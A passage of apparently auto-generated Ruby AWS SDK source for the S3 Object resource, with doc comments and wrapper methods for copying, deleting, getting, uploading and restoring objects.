# The value must be URL encoded.
#
# To copy a specific version of an object, append
# `?versionId=<version-id>` to the value (for example,
# `awsexamplebucket/reports/january.pdf?versionId=QUpfdndhfd8438MNFDN93jdnJFkdmqnh893`).
# If you don't specify a version ID, Amazon S3 copies the latest
# version of the source object.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/access-points.html
# @option options [String] :copy_source_if_match
# Copies the object if its entity tag (ETag) matches the specified tag.
# @option options [Time,DateTime,Date,Integer,String] :copy_source_if_modified_since
# Copies the object if it has been modified since the specified time.
# @option options [String] :copy_source_if_none_match
# Copies the object if its entity tag (ETag) is different than the
# specified ETag.
# @option options [Time,DateTime,Date,Integer,String] :copy_source_if_unmodified_since
# Copies the object if it hasn't been modified since the specified
# time.
# @option options [Time,DateTime,Date,Integer,String] :expires
# The date and time at which the object is no longer cacheable.
# @option options [String] :grant_full_control
# Gives the grantee READ, READ\_ACP, and WRITE\_ACP permissions on the
# object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read
# Allows grantee to read the object data and its metadata.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read_acp
# Allows grantee to read the object ACL.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_write_acp
# Allows grantee to write the ACL for the applicable object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [Hash<String,String>] :metadata
# A map of metadata to store with the object in S3.
# @option options [String] :metadata_directive
# Specifies whether the metadata is copied from the source object or
# replaced with metadata provided in the request.
# @option options [String] :tagging_directive
# Specifies whether the object tag-set are copied from the source object
# or replaced with tag-set provided in the request.
# @option options [String] :server_side_encryption
# The server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @option options [String] :storage_class
# By default, Amazon S3 uses the STANDARD Storage Class to store newly
# created objects. The STANDARD storage class provides high durability
# and high availability. Depending on performance needs, you can specify
# a different Storage Class. Amazon S3 on Outposts only uses the
# OUTPOSTS Storage Class. For more information, see [Storage Classes][1]
# in the *Amazon S3 Service Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @option options [String] :website_redirect_location
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata.
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when encrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use in
# encrypting data. This value is used to store the object and then it is
# discarded; Amazon S3 does not store the encryption key. The key must
# be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :ssekms_key_id
# Specifies the AWS KMS key ID to use for object encryption. All GET and
# PUT requests for an object protected by AWS KMS will fail if not made
# via SSL or using SigV4. For information about configuring using any of
# the officially supported AWS SDKs and AWS CLI, see [Specifying the
# Signature Version in Request Authentication][1] in the *Amazon S3
# Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingAWSSDK.html#specify-signature-version
# @option options [String] :ssekms_encryption_context
# Specifies the AWS KMS Encryption Context to use for object encryption.
# The value of this header is a base64-encoded UTF-8 string holding JSON
# with the encryption context key-value pairs.
# @option options [Boolean] :bucket_key_enabled
# Specifies whether Amazon S3 should use an S3 Bucket Key for object
# encryption with server-side encryption using AWS KMS (SSE-KMS).
# Setting this header to `true` causes Amazon S3 to use an S3 Bucket Key
# for object encryption with SSE-KMS.
#
# Specifying this header with a COPY action doesn’t affect bucket-level
# settings for S3 Bucket Key.
# @option options [String] :copy_source_sse_customer_algorithm
# Specifies the algorithm to use when decrypting the source object (for
# example, AES256).
# @option options [String] :copy_source_sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use to
# decrypt the source object. The encryption key provided in this header
# must be one that was used when the source object was created.
# @option options [String] :copy_source_sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :tagging
# The tag-set for the object destination object this value must be used
# in conjunction with the `TaggingDirective`. The tag-set must be
# encoded as URL Query parameters.
# @option options [String] :object_lock_mode
# The Object Lock mode that you want to apply to the copied object.
# @option options [Time,DateTime,Date,Integer,String] :object_lock_retain_until_date
# The date and time when you want the copied object's Object Lock to
# expire.
# @option options [String] :object_lock_legal_hold_status
# Specifies whether you want to apply a Legal Hold to the copied object.
# @option options [String] :expected_bucket_owner
# The account id of the expected destination bucket owner. If the
# destination bucket is owned by a different account, the request will
# fail with an HTTP `403 (Access Denied)` error.
# @option options [String] :expected_source_bucket_owner
# The account id of the expected source bucket owner. If the source
# bucket is owned by a different account, the request will fail with an
# HTTP `403 (Access Denied)` error.
# @return [Types::CopyObjectOutput]
def copy_from(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.copy_object(options)
resp.data
end
# @example Request syntax with placeholder values
#
# object.delete({
# mfa: "MFA",
# version_id: "ObjectVersionId",
# request_payer: "requester", # accepts requester
# bypass_governance_retention: false,
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :mfa
# The concatenation of the authentication device's serial number, a
# space, and the value that is displayed on your authentication device.
# Required to permanently delete a versioned object if versioning is
# configured with MFA delete enabled.
# @option options [String] :version_id
# VersionId used to reference a specific version of the object.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [Boolean] :bypass_governance_retention
# Indicates whether S3 Object Lock should bypass Governance-mode
# restrictions to process this operation.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::DeleteObjectOutput]
def delete(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.delete_object(options)
resp.data
end
# @example Request syntax with placeholder values
#
# object.get({
# if_match: "IfMatch",
# if_modified_since: Time.now,
# if_none_match: "IfNoneMatch",
# if_unmodified_since: Time.now,
# range: "Range",
# response_cache_control: "ResponseCacheControl",
# response_content_disposition: "ResponseContentDisposition",
# response_content_encoding: "ResponseContentEncoding",
# response_content_language: "ResponseContentLanguage",
# response_content_type: "ResponseContentType",
# response_expires: Time.now,
# version_id: "ObjectVersionId",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# request_payer: "requester", # accepts requester
# part_number: 1,
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :if_match
# Return the object only if its entity tag (ETag) is the same as the one
# specified, otherwise return a 412 (precondition failed).
# @option options [Time,DateTime,Date,Integer,String] :if_modified_since
# Return the object only if it has been modified since the specified
# time, otherwise return a 304 (not modified).
# @option options [String] :if_none_match
# Return the object only if its entity tag (ETag) is different from the
# one specified, otherwise return a 304 (not modified).
# @option options [Time,DateTime,Date,Integer,String] :if_unmodified_since
# Return the object only if it has not been modified since the specified
# time, otherwise return a 412 (precondition failed).
# @option options [String] :range
# Downloads the specified range bytes of an object. For more information
# about the HTTP Range header, see
# [https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35][1].
#
# <note markdown="1"> Amazon S3 doesn't support retrieving multiple ranges of data per
# `GET` request.
#
# </note>
#
#
#
# [1]: https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35
# @option options [String] :response_cache_control
# Sets the `Cache-Control` header of the response.
# @option options [String] :response_content_disposition
# Sets the `Content-Disposition` header of the response
# @option options [String] :response_content_encoding
# Sets the `Content-Encoding` header of the response.
# @option options [String] :response_content_language
# Sets the `Content-Language` header of the response.
# @option options [String] :response_content_type
# Sets the `Content-Type` header of the response.
# @option options [Time,DateTime,Date,Integer,String] :response_expires
# Sets the `Expires` header of the response.
# @option options [String] :version_id
# VersionId used to reference a specific version of the object.
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when decrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 used to
# encrypt the data. This value is used to decrypt the object when
# recovering it and must match the one used when storing the data. The
# key must be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [Integer] :part_number
# Part number of the object being read. This is a positive integer
# between 1 and 10,000. Effectively performs a 'ranged' GET request
# for the part specified. Useful for downloading just a part of an
# object.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::GetObjectOutput]
def get(options = {}, &block)
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.get_object(options, &block)
resp.data
end
# @example Request syntax with placeholder values
#
# multipartupload = object.initiate_multipart_upload({
# acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# cache_control: "CacheControl",
# content_disposition: "ContentDisposition",
# content_encoding: "ContentEncoding",
# content_language: "ContentLanguage",
# content_type: "ContentType",
# expires: Time.now,
# grant_full_control: "GrantFullControl",
# grant_read: "GrantRead",
# grant_read_acp: "GrantReadACP",
# grant_write_acp: "GrantWriteACP",
# metadata: {
# "MetadataKey" => "MetadataValue",
# },
# server_side_encryption: "AES256", # accepts AES256, aws:kms
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# website_redirect_location: "WebsiteRedirectLocation",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# ssekms_key_id: "SSEKMSKeyId",
# ssekms_encryption_context: "SSEKMSEncryptionContext",
# bucket_key_enabled: false,
# request_payer: "requester", # accepts requester
# tagging: "TaggingHeader",
# object_lock_mode: "GOVERNANCE", # accepts GOVERNANCE, COMPLIANCE
# object_lock_retain_until_date: Time.now,
# object_lock_legal_hold_status: "ON", # accepts ON, OFF
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :acl
# The canned ACL to apply to the object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :cache_control
# Specifies caching behavior along the request/reply chain.
# @option options [String] :content_disposition
# Specifies presentational information for the object.
# @option options [String] :content_encoding
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field.
# @option options [String] :content_language
# The language the content is in.
# @option options [String] :content_type
# A standard MIME type describing the format of the object data.
# @option options [Time,DateTime,Date,Integer,String] :expires
# The date and time at which the object is no longer cacheable.
# @option options [String] :grant_full_control
# Gives the grantee READ, READ\_ACP, and WRITE\_ACP permissions on the
# object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read
# Allows grantee to read the object data and its metadata.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read_acp
# Allows grantee to read the object ACL.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_write_acp
# Allows grantee to write the ACL for the applicable object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [Hash<String,String>] :metadata
# A map of metadata to store with the object in S3.
# @option options [String] :server_side_encryption
# The server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @option options [String] :storage_class
# By default, Amazon S3 uses the STANDARD Storage Class to store newly
# created objects. The STANDARD storage class provides high durability
# and high availability. Depending on performance needs, you can specify
# a different Storage Class. Amazon S3 on Outposts only uses the
# OUTPOSTS Storage Class. For more information, see [Storage Classes][1]
# in the *Amazon S3 Service Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @option options [String] :website_redirect_location
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata.
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when encrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use in
# encrypting data. This value is used to store the object and then it is
# discarded; Amazon S3 does not store the encryption key. The key must
# be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :ssekms_key_id
# Specifies the ID of the symmetric customer managed AWS KMS CMK to use
# for object encryption. All GET and PUT requests for an object
# protected by AWS KMS will fail if not made via SSL or using SigV4. For
# information about configuring using any of the officially supported
# AWS SDKs and AWS CLI, see [Specifying the Signature Version in Request
# Authentication][1] in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingAWSSDK.html#specify-signature-version
# @option options [String] :ssekms_encryption_context
# Specifies the AWS KMS Encryption Context to use for object encryption.
# The value of this header is a base64-encoded UTF-8 string holding JSON
# with the encryption context key-value pairs.
# @option options [Boolean] :bucket_key_enabled
# Specifies whether Amazon S3 should use an S3 Bucket Key for object
# encryption with server-side encryption using AWS KMS (SSE-KMS).
# Setting this header to `true` causes Amazon S3 to use an S3 Bucket Key
# for object encryption with SSE-KMS.
#
# Specifying this header with an object action doesn’t affect
# bucket-level settings for S3 Bucket Key.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :tagging
# The tag-set for the object. The tag-set must be encoded as URL Query
# parameters.
# @option options [String] :object_lock_mode
# Specifies the Object Lock mode that you want to apply to the uploaded
# object.
# @option options [Time,DateTime,Date,Integer,String] :object_lock_retain_until_date
# Specifies the date and time when you want the Object Lock to expire.
# @option options [String] :object_lock_legal_hold_status
# Specifies whether you want to apply a Legal Hold to the uploaded
# object.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [MultipartUpload]
def initiate_multipart_upload(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.create_multipart_upload(options)
MultipartUpload.new(
bucket_name: @bucket_name,
object_key: @key,
id: resp.data.upload_id,
client: @client
)
end
# @example Request syntax with placeholder values
#
# object.put({
# acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# body: source_file,
# cache_control: "CacheControl",
# content_disposition: "ContentDisposition",
# content_encoding: "ContentEncoding",
# content_language: "ContentLanguage",
# content_length: 1,
# content_md5: "ContentMD5",
# content_type: "ContentType",
# expires: Time.now,
# grant_full_control: "GrantFullControl",
# grant_read: "GrantRead",
# grant_read_acp: "GrantReadACP",
# grant_write_acp: "GrantWriteACP",
# metadata: {
# "MetadataKey" => "MetadataValue",
# },
# server_side_encryption: "AES256", # accepts AES256, aws:kms
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# website_redirect_location: "WebsiteRedirectLocation",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# ssekms_key_id: "SSEKMSKeyId",
# ssekms_encryption_context: "SSEKMSEncryptionContext",
# bucket_key_enabled: false,
# request_payer: "requester", # accepts requester
# tagging: "TaggingHeader",
# object_lock_mode: "GOVERNANCE", # accepts GOVERNANCE, COMPLIANCE
# object_lock_retain_until_date: Time.now,
# object_lock_legal_hold_status: "ON", # accepts ON, OFF
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :acl
# The canned ACL to apply to the object. For more information, see
# [Canned ACL][1].
#
# This action is not supported by Amazon S3 on Outposts.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#CannedACL
# @option options [String, StringIO, File] :body
# Object data.
# @option options [String] :cache_control
# Can be used to specify caching behavior along the request/reply chain.
# For more information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9
# @option options [String] :content_disposition
# Specifies presentational information for the object. For more
# information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1
# @option options [String] :content_encoding
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field. For more information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11
# @option options [String] :content_language
# The language the content is in.
# @option options [Integer] :content_length
# Size of the body in bytes. This parameter is useful when the size of
# the body cannot be determined automatically. For more information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13
# @option options [String] :content_md5
# The base64-encoded 128-bit MD5 digest of the message (without the
# headers) according to RFC 1864. This header can be used as a message
# integrity check to verify that the data is the same data that was
# originally sent. Although it is optional, we recommend using the
# Content-MD5 mechanism as an end-to-end integrity check. For more
# information about REST request authentication, see [REST
# Authentication][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html
# @option options [String] :content_type
# A standard MIME type describing the format of the contents. For more
# information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.17][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.17
# @option options [Time,DateTime,Date,Integer,String] :expires
# The date and time at which the object is no longer cacheable. For more
# information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.21][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.21
# @option options [String] :grant_full_control
# Gives the grantee READ, READ\_ACP, and WRITE\_ACP permissions on the
# object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read
# Allows grantee to read the object data and its metadata.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read_acp
# Allows grantee to read the object ACL.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_write_acp
# Allows grantee to write the ACL for the applicable object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [Hash<String,String>] :metadata
# A map of metadata to store with the object in S3.
# @option options [String] :server_side_encryption
# The server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @option options [String] :storage_class
# By default, Amazon S3 uses the STANDARD Storage Class to store newly
# created objects. The STANDARD storage class provides high durability
# and high availability. Depending on performance needs, you can specify
# a different Storage Class. Amazon S3 on Outposts only uses the
# OUTPOSTS Storage Class. For more information, see [Storage Classes][1]
# in the *Amazon S3 Service Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @option options [String] :website_redirect_location
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata. For
# information about object metadata, see [Object Key and Metadata][1].
#
# In the following example, the request header sets the redirect to an
# object (anotherPage.html) in the same bucket:
#
# `x-amz-website-redirect-location: /anotherPage.html`
#
# In the following example, the request header sets the object redirect
# to another website:
#
# `x-amz-website-redirect-location: http://www.example.com/`
#
# For more information about website hosting in Amazon S3, see [Hosting
# Websites on Amazon S3][2] and [How to Configure Website Page
# Redirects][3].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html
# [2]: https://docs.aws.amazon.com/AmazonS3/latest/dev/WebsiteHosting.html
# [3]: https://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when encrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use in
# encrypting data. This value is used to store the object and then it is
# discarded; Amazon S3 does not store the encryption key. The key must
# be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :ssekms_key_id
# If `x-amz-server-side-encryption` is present and has the value of
# `aws:kms`, this header specifies the ID of the AWS Key Management
# Service (AWS KMS) symmetrical customer managed customer master key
# (CMK) that was used for the object.
#
# If the value of `x-amz-server-side-encryption` is `aws:kms`, this
# header specifies the ID of the symmetric customer managed AWS KMS CMK
# that will be used for the object. If you specify
# `x-amz-server-side-encryption:aws:kms`, but do not provide`
# x-amz-server-side-encryption-aws-kms-key-id`, Amazon S3 uses the AWS
# managed CMK in AWS to protect the data.
# @option options [String] :ssekms_encryption_context
# Specifies the AWS KMS Encryption Context to use for object encryption.
# The value of this header is a base64-encoded UTF-8 string holding JSON
# with the encryption context key-value pairs.
# @option options [Boolean] :bucket_key_enabled
# Specifies whether Amazon S3 should use an S3 Bucket Key for object
# encryption with server-side encryption using AWS KMS (SSE-KMS).
# Setting this header to `true` causes Amazon S3 to use an S3 Bucket Key
# for object encryption with SSE-KMS.
#
# Specifying this header with a PUT action doesn’t affect bucket-level
# settings for S3 Bucket Key.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :tagging
# The tag-set for the object. The tag-set must be encoded as URL Query
# parameters. (For example, "Key1=Value1")
# @option options [String] :object_lock_mode
# The Object Lock mode that you want to apply to this object.
# @option options [Time,DateTime,Date,Integer,String] :object_lock_retain_until_date
# The date and time when you want this object's Object Lock to expire.
# @option options [String] :object_lock_legal_hold_status
# Specifies whether a legal hold will be applied to this object. For
# more information about S3 Object Lock, see [Object Lock][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock.html
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::PutObjectOutput]
def put(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.put_object(options)
resp.data
end
# @example Request syntax with placeholder values
#
# object.restore_object({
# version_id: "ObjectVersionId",
# restore_request: {
# days: 1,
# glacier_job_parameters: {
# tier: "Standard", # required, accepts Standard, Bulk, Expedited
# },
# type: "SELECT", # accepts SELECT
# tier: "Standard", # accepts Standard, Bulk, Expedited
# description: "Description",
# select_parameters: {
# input_serialization: { # required
# csv: {
# file_header_info: "USE", # accepts USE, IGNORE, NONE
# comments: "Comments",
# quote_escape_character: "QuoteEscapeCharacter",
# record_delimiter: "RecordDelimiter",
# field_delimiter: "FieldDelimiter",
# quote_character: "QuoteCharacter",
# allow_quoted_record_delimiter: false,
# },
# compression_type: "NONE", # accepts NONE, GZIP, BZIP2
# json: {
# type: "DOCUMENT", # accepts DOCUMENT, LINES
# },
# parquet: {
# },
# },
# expression_type: "SQL", # required, accepts SQL
# expression: "Expression", # required
# output_serialization: { # required
# csv: {
# quote_fields: "ALWAYS", # accepts ALWAYS, ASNEEDED
# quote_escape_character: "QuoteEscapeCharacter",
# record_delimiter: "RecordDelimiter",
# field_delimiter: "FieldDelimiter",
# quote_character: "QuoteCharacter",
# },
# json: {
# record_delimiter: "RecordDelimiter",
# },
# },
# },
# output_location: {
# s3: {
# bucket_name: "BucketName", # required
# prefix: "LocationPrefix", # required
# encryption: {
# encryption_type: "AES256", # required, accepts AES256, aws:kms
# kms_key_id: "SSEKMSKeyId",
# kms_context: "KMSContext",
# },
# canned_acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# access_control_list: [
# {
# grantee: {
# display_name: "DisplayName",
# email_address: "EmailAddress",
# id: "ID",
# type: "CanonicalUser", # required, accepts CanonicalUser, AmazonCustomerByEmail, Group
# uri: "URI",
# },
# permission: "FULL_CONTROL", # accepts FULL_CONTROL, WRITE, WRITE_ACP, READ, READ_ACP
# },
# ],
# tagging: {
# tag_set: [ # required
# {
# key: "ObjectKey", # required
# value: "Value", # required
# },
# ],
# },
# user_metadata: [
# {
# name: "MetadataKey",
# value: "MetadataValue",
# },
# ],
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# },
# },
# },
# request_payer: "requester", # accepts requester
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :version_id
# VersionId used to reference a specific version of the object.
# @option options [Types::RestoreRequest] :restore_request
# Container for restore job parameters.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::RestoreObjectOutput]
def restore_object(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.restore_object(options)
resp.data
end
# @!group Associations
# @return [ObjectAcl]
def acl
ObjectAcl.new(
bucket_name: @bucket_name,
object_key: @key,
client: @client
)
end
# @return [Bucket]
def bucket
Bucket.new(
name: @bucket_name,
client: @client
)
end
# @param [String] id
# @return [MultipartUpload]
def multipart_upload(id)
MultipartUpload.new(
bucket_name: @bucket_name,
object_key: @key,
id: id,
client: @client
)
end
# @param [String] id
# @return [ObjectVersion]
def version(id)
ObjectVersion.new(
bucket_name: @bucket_name,
object_key: @key,
id: id,
client: @client
)
end
# @deprecated
# @api private
def identifiers
{
bucket_name: @bucket_name,
key: @key
}
end
deprecated(:identifiers)
private
def extract_bucket_name(args, options)
value = args[0] || options.delete(:bucket_name)
case value
when String then value
when nil then raise ArgumentError, "missing required option :bucket_name"
else
msg = "expected :bucket_name to be a String, got #{value.class}"
raise ArgumentError, msg
end
end
def extract_key(args, options)
value = args[1] || options.delete(:key)
case value
when String then value
when nil then raise ArgumentError, "missing required option :key"
else
msg = "expected :key to be a String, got #{value.class}"
raise ArgumentError, msg
end
end
def yield_waiter_and_warn(waiter, &block)
if !@waiter_block_warned
msg = "pass options to configure the waiter; "\
"yielding the waiter is deprecated"
warn(msg)
@waiter_block_warned = true
end
yield(waiter.waiter)
end
def separate_params_and_options(options)
opts = Set.new(
[:client, :max_attempts, :delay, :before_attempt, :before_wait]
)
waiter_opts = {}
waiter_params = {}
options.each_pair do |key, value|
if opts.include?(key)
waiter_opts[key] = value
else
waiter_params[key] = value
end
end
waiter_opts[:client] ||= @client
[waiter_opts, waiter_params]
end
class Collection < Aws::Resources::Collection
# @!group Batch Actions
# @example Request syntax with placeholder values
#
# object.batch_delete!({
# mfa: "MFA",
# request_payer: "requester", # accepts requester
# bypass_governance_retention: false,
# expected_bucket_owner: "AccountId",
# })
# @param options ({})
# @option options [String] :mfa
# The concatenation of the authentication device's serial number, a
# space, and the value that is displayed on your authentication device.
# Required to permanently delete a versioned object if versioning is
